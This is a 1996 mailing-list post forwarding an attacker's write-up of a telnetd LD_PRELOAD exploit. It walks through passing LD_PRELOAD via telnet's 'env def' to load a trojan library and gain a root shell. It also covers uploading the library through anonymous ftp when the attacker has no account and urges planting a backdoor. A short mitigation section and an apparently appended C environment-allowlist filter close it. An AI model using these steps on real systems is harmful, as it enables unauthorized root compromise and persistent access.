On Sat, 24 Aug 1996, Gorkem Cetin wrote:
> Hi,
> The Linux telnetd bug below gives root access on 90% of Linux machines,
> even without an account on the remote side. It has also been compiled for
> SunOS.
> Check your machines.
> Best regards,
> Gorkem.
>
>
>
> Gday. This makefile produces a library, which when specified when initiating
> a telnet session allows you to start a root shell when connecting to the
> machine.
>
> To compile this, type make all. This will compile all the files, produce a
> library from the object code and name it XXXXXX.
>
> You then need to open a telnet connection to the machine where this library
> resides.
>
> -- -- -- -- --
>
> mine% telnet
> telnet> env def LD_PRELOAD /tmp/XXXXX
> telnet> o
> (to) target.machine
>
> Trying xxx.xxx.xxx.xxx
> Connected to xxxxxxxx.
> Escape character is '^]'.
>
> Linux 1.2.13
>
> login: jruser
> Squidge - The Guild presents you with a setuid 0 shell
> bash#
>
> -- -- -- -- --
>
> NOTES:
> The library you compiled *must* be on the machine you are trying to
> break into. If you have an account, make it there and set the LD_PRELOAD
> path to point to it in your homedir. If you have no account, try putting it
> in incoming with ftp. The resultant path will be
> /home/ftp/incoming/XXXXXX
>
> If you have any problems email me at squidge@onyx.infonexus.com
>
> ERRATA:
> At the moment, this only works for ELF machines. Support for a.out
> will be added shortly.
>
> Squidge - The Guild
> onyx.infonexus.com onyx.infonexus.com onyx.infonexus.com onyx.infonexus.com
>
> METHOD:
>
> Method One (If you have an account on the machine you want root on. Try this
> first.)
>
> (1) gunzip and untar the source into a directory, eg /home/squidge/XXXXXX
> (2) compile the programs by typing make all
> (3) wait
> (4) you will have a file /tmp/
> (5) type telnet
> (6) at the telnet> prompt, type env def LD_PRELOAD /tmp/XXXXX
> This tells telnet to pass the environment variable LD_PRELOAD to the
> target machine. LD_PRELOAD points to our trojan library.
> (7) type open localhost
> (8) If you don't get a bash# prompt, but get login:, type something like test
> You should now be greeted with bash#. Type id and see that you are root.
> Note that telnetd will time you out, so make some attempt at a backdoor.
>
> Method Two (If you have no account on the target machine)
>
> (1) as above
> (2) as above, if you are running the same hardware as the target. If you are
> on different processors, try compiling on a different machine. If you
> know what you are doing, try changing the target architecture used by
> gcc and ld. It is the -m flag with ld.
> (3) assuming you have the correct binary, open an ftp connection to the
> target
> (4) using bin mode, upload your trojan library to the target's incoming
> directory.
> (5) switch back to your machine, start telnet and specify the path of the
> target's ftp directory as your LD_PRELOAD. On linux this is normally
> /home/ftp/incoming. On others generally /var/ftp/incoming or
> /etc/ftp/incoming.
> (6) as number 8 above.
>
> If you opt for method 2, you will need a pretty good idea of what is going
> on. It is not for the fainthearted. If demand is high, I may release a new
> set of .o files for different architectures. There should be no need. I can
> compile for Sun(SPARC), M68 and x86 on my linux box. So can you.
>
> HOW TO PROTECT:
> There are a few ways. If you have a statically linked login, then you are
> safe. setuid programs ignore LD_PRELOAD, so once you have logged in, you
> cannot subvert the system.
>
> You can patch telnetd to wipe all but a few env variables. There are many
> widely available pieces of code to demonstrate this.
>
>
>
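The mitigation mentioned under HOW TO PROTECT, a telnetd that forwards only a few environment variables to login, sketched as an added example in C (not code from the original post or from any telnetd). The allowlist contents and function names are assumptions; the sample client environment is constructed from the values the post uses.

```c
/* Added example, not code from the original post: an allowlist filter for the
 * environment a telnetd-style service forwards to login(1). Names are assumed. */
#include <stdio.h>
#include <string.h>

/* Variables a login service may reasonably pass through; everything else,
 * including every LD_* dynamic-loader variable, is dropped. */
static const char *const allowed_names[] = { "TERM", "DISPLAY", "LANG" };

/* Returns 1 if "NAME=value" has a NAME in the allowlist and is not an LD_*
 * loader control, 0 otherwise (malformed entries without '=' are rejected). */
int env_entry_allowed(const char *entry)
{
    const char *eq = strchr(entry, '=');
    if (eq == NULL || eq == entry)
        return 0;
    size_t namelen = (size_t)(eq - entry);
    if (namelen >= 3 && strncmp(entry, "LD_", 3) == 0)
        return 0;                       /* defence in depth: never forward LD_* */
    for (size_t i = 0; i < sizeof allowed_names / sizeof allowed_names[0]; i++)
        if (strlen(allowed_names[i]) == namelen &&
            strncmp(entry, allowed_names[i], namelen) == 0)
            return 1;
    return 0;
}

/* Copies allowed entries of the NULL-terminated `in` into `out` (capacity
 * `outcap`), NULL-terminates `out`, and returns the number kept. */
size_t filter_environment(char *const *in, char **out, size_t outcap)
{
    size_t n = 0;
    for (size_t i = 0; in[i] != NULL && n + 1 < outcap; i++)
        if (env_entry_allowed(in[i]))
            out[n++] = in[i];
    out[n] = NULL;
    return n;
}

int main(void)
{
    /* Constructed sample of what a client could send with "env def". */
    char *client_env[] = { "TERM=vt100", "LD_PRELOAD=/tmp/XXXXX", "HOME=/tmp",
                           "LD_LIBRARY_PATH=/home/ftp/incoming", "DISPLAY=:0",
                           "BOGUS", NULL };
    char *safe_env[8];
    size_t kept = filter_environment(client_env, safe_env, 8);
    for (size_t i = 0; i < kept; i++)
        printf("forwarding %s\n", safe_env[i]);  /* TERM and DISPLAY only */
    return 0;
}
```

The filtered array is what would be handed to execve() for login; a static login binary, as the post notes, removes the dependency on this filter entirely.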